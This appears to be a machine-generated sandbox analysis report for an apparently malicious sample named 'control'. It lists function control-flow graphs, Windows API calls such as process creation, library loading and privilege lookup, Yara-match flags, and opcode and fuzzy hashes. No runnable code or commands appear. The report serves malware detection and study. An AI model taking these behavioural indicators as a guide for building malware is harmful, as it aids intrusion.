                                  control_flow_graph 405 2549080-25490af 406 25490bb-25490c2 405->406 407 25490b6 call 254bd40 405->407 408 254919c-25491a2 406->408 409 25490c8-2549118 call 254be10 call 253acf0 call 2544e50 406->409 407->406 416 2549120-2549131 Sleep 409->416 417 2549196-254919a 416->417 418 2549133-2549139 416->418 417->408 417->416 419 2549163-2549183 418->419 420 254913b-2549161 call 2548ca0 418->420 421 2549189-254918c 419->421 422 2549184 call 2548eb0 419->422 420->421 421->417 422->421
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02549128
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: a4826623e7868b6d09aa693b87d54e3f9d130cbf8debe4ac90b6fe1b62c8f438
                                  • Instruction ID: b1af3abf4fc304a07bf63580649676b39e73c941715cdf0912e72a4fac36b3e7
                                  • Opcode Fuzzy Hash: a4826623e7868b6d09aa693b87d54e3f9d130cbf8debe4ac90b6fe1b62c8f438
                                  • Instruction Fuzzy Hash: 513161B2900645ABC714DF64C889F67F7B9BB88B05F10851DF62A5B245DA30A650CBA8
                                  Function 02549076 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 425 2549076-25490c2 call 254bd40 428 254919c-25491a2 425->428 429 25490c8-2549118 call 254be10 call 253acf0 call 2544e50 425->429 436 2549120-2549131 Sleep 429->436 437 2549196-254919a 436->437 438 2549133-2549139 436->438 437->428 437->436 439 2549163-2549183 438->439 440 254913b-2549161 call 2548ca0 438->440 441 2549189-254918c 439->441 442 2549184 call 2548eb0 439->442 440->441 441->437 442->441
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02549128
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 3303cf2d7ae34a60da9932287dbf4d8a4abee8dad8b5115c484271d44e3ec96c
                                  • Instruction ID: d8822eee1f09eb01dd9137896b8da0a57941f673f82399d491f7486f14a1d88a
                                  • Opcode Fuzzy Hash: 3303cf2d7ae34a60da9932287dbf4d8a4abee8dad8b5115c484271d44e3ec96c
                                  • Instruction Fuzzy Hash: 6F21A2B1940345ABC714DF64CC85B67F7B5FB88B08F10801DE62D5B245DB70A550CBA9
                                  Function 0254A662 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 554 254a662-254a684 555 254a68c-254a6a1 RtlFreeHeap 554->555 556 254a687 call 254af60 554->556 556->555
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02533AF8), ref: 0254A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 3b169a03a4d6d4869557df61860f443006a029f9ed7622e83cbd9cf270615e2b
                                  • Instruction ID: f069c804ad5f1e4bcf09883f91f73fdc77a774ab61ab39d0d266af85331d95ab
                                  • Opcode Fuzzy Hash: 3b169a03a4d6d4869557df61860f443006a029f9ed7622e83cbd9cf270615e2b
                                  • Instruction Fuzzy Hash: 7AE068B91042860FD700EE79D4A049F37D4FFC0318720865AEC584B307D020C40B8761
                                  Function 0254A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 557 254a670-254a6a1 call 254af60 RtlFreeHeap
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02533AF8), ref: 0254A69D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID: .z`
                                  • API String ID: 3298025750-1441809116
                                  • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction ID: 047bfc3392c754dbd357d0a1b7ccf774e198d525e2411cf163488d5f94b3cc1c
                                  • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                  • Instruction Fuzzy Hash: 29E04FB52002087BD714DF59CC44EA777ADEF88754F118554FD0857241C630F910CAF0
                                  Function 02538310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0253836A
                                  • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0253838B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID:
                                  • API String ID: 1836367815-0
                                  • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                  • Instruction ID: ae5aa46553025769aafdfa86363c75d9cd359e0c80bd35321bd279d343de95b6
                                  • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                  • Instruction Fuzzy Hash: F501A731A8122977E722AA94DC42FBEB76D6B80F55F040115FF04BA1C1EAA4690547FA
                                  Function 0253ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0253AD62
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction ID: 31582f238beb3c30e6d8c6c3ed8ca2daf2457efbbeb5facba34395b0f46edc5d
                                  • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                  • Instruction Fuzzy Hash: 5A011EB5E0020EABDF10DAE4DC45F9DB779AB54308F004595E90897241FA31E7148B95
                                  Function 0254A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0254A734
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction ID: b44ede6e5228d230972ba77778aa03fad5a9c89fc5fd37a7419543288c51121e
                                  • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                  • Instruction Fuzzy Hash: 9401B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                  Function 0254A7C2 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0253F1D2,0253F1D2,?,00000000,?,?), ref: 0254A800
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: a74d6b44c497589037dee59f5b64dfe1477963b6447a0ab723df86f9e3b050e7
                                  • Instruction ID: 3d3505c4750e43510b0ab6149032d0eeed218ccb193261a17e21a2651ee06f39
                                  • Opcode Fuzzy Hash: a74d6b44c497589037dee59f5b64dfe1477963b6447a0ab723df86f9e3b050e7
                                  • Instruction Fuzzy Hash: 24F049B62401197FDB14DFA9DC84EEB77A9EFC8254F108619F90CD7285C631E9118BB4
                                  Function 025491B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0253F050,?,?,00000000), ref: 025491EC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                  • Instruction ID: 0f61685776051b3b7233ea33a3f2be15ef935ed370e6ba8aad4e05521ba1a20f
                                  • Opcode Fuzzy Hash: d8d341beacf55d3aadfcb46bdd6eb0ebc06c290d7a953d7ae1546744555f20b2
                                  • Instruction Fuzzy Hash: 28E06D373802043AE3206599AC02FA7B29DDBC1B24F150026FA0DEA2C0D995F40146A9
                                  Function 0254A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02544536,?,02544CAF,02544CAF,?,02544536,?,?,?,?,?,00000000,00000000,?), ref: 0254A65D
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction ID: eb1ea3ffa83968c240aa6f5fed797ff9b63ad37103f26a25052ecf8c39f7c003
                                  • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                  • Instruction Fuzzy Hash: C4E012B6200208ABDB14EF99CC40EA777ADEF88654F118558BE085B241CA30F9118AB0
                                  Function 0254A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule
                                  APIs
                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,0253F1D2,0253F1D2,?,00000000,?,?), ref: 0254A800
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: LookupPrivilegeValue
                                  • String ID:
                                  • API String ID: 3899507212-0
                                  • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction ID: a9f22c8a3e3eea659b6cfb6cfba540d094ae355c4775d97d6a2e19bfd2f44805
                                  • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                  • Instruction Fuzzy Hash: FDE01AB52002086BDB10DF49CC84EE777ADEF88654F118154BE0857241C930E8118BF5
                                  Function 0253F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,02538D14,?), ref: 0253F6FB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                  • Instruction ID: eb5ddeccca0ecb7c6075cdbb0e51adec8929c833ea89900dea27b8c839e71d10
                                  • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                  • Instruction Fuzzy Hash: 51D05E716903093AE610AAA49C02F2672896B44A44F490064F948962C3DD60E0004569
                                  Function 047C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                  • Instruction ID: b66740453366ca3e759c1fb0cc31d147f02d40d7cbd707ac5daf6f805d97e07f
                                  • Opcode Fuzzy Hash: 86e4bb72e3055b942eb4fa63c87621d8c4056e0a1467428530fcf7d4fafe4dda
                                  • Instruction Fuzzy Hash: 2EB09B75D015D5C5FB21F760460871779106BD0705F16C075D2130661F4738D1D5E176

                                  Non-executed Functions

                                  Function 04832410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                  • Instruction ID: a9e1b6db54377f8e114c12f28d3553769ba0f37f43eb4a774763de6adeedd683
                                  • Opcode Fuzzy Hash: a565b5782e0b1093c81c48619a92b5871a22f33637aac1b46058ffbebfd420a2
                                  • Instruction Fuzzy Hash: 6A51E5B1A00645AFDF30DF9CC89097EB7F8EB44205B448E99E496D7641E6B4FA40CBA0
                                  Function 047B7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 047F4787
                                  • ExecuteOptions, xrefs: 047F46A0
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047F4725
                                  • Execute=1, xrefs: 047F4713
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047F46FC
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047F4742
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047F4655
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                  • Instruction ID: 1faa7dc06a3b1457147da765b91097207067f9ca0391dc197d7a0ce1540231f9
                                  • Opcode Fuzzy Hash: 18ab5c31531b8d76eed522fd1786162b254ce127551b6554adf6991d7dd3931e
                                  • Instruction Fuzzy Hash: 63510B716002196BEF24AA68DC99FEE73BCEF54308F040499DA45A7390E770BE458F90
                                  Function 047CB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 946d71d189b134fbc13543dfbda6b3efaffd1bf6d540ab27cfc8df5cdd665ebb
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: 5481C070E452499EDF24CE68E8927FEBBB5AF45320F18451EF861A73D1D734B8408B50
                                  Function 047AF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 047F031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047F02BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047F02E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                  • Instruction ID: e368b0573ea45718023722d121d015cb1fff70f7ab54bf665ba4dbad640b96d0
                                  • Opcode Fuzzy Hash: 7ac158bcd525c328d28267ededb857406a1b82df038541f288c439c068aece75
                                  • Instruction Fuzzy Hash: 4DE1AC706087419FE725CF28C884B2AB7E1AF88324F144B6DE5A58B3E1E774F855CB52
                                  Function 047BB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 047F728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 047F7294
                                  • RTL: Re-Waiting, xrefs: 047F72C1
                                  • RTL: Resource at %p, xrefs: 047F72A3
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                  • Instruction ID: 2c8fa0b5586e83afc21070c55a55024793a22bb49c87595ddab77bdf5b28dd24
                                  • Opcode Fuzzy Hash: 3953c8335f75171907e19ccba35b7d0c236fea929da1a3752f952cbc5579fc9f
                                  • Instruction Fuzzy Hash: 9041EF31701202AFE724DE65CD41BAAB7A5FB84714F104A19FE95EB780DB60F8429BD2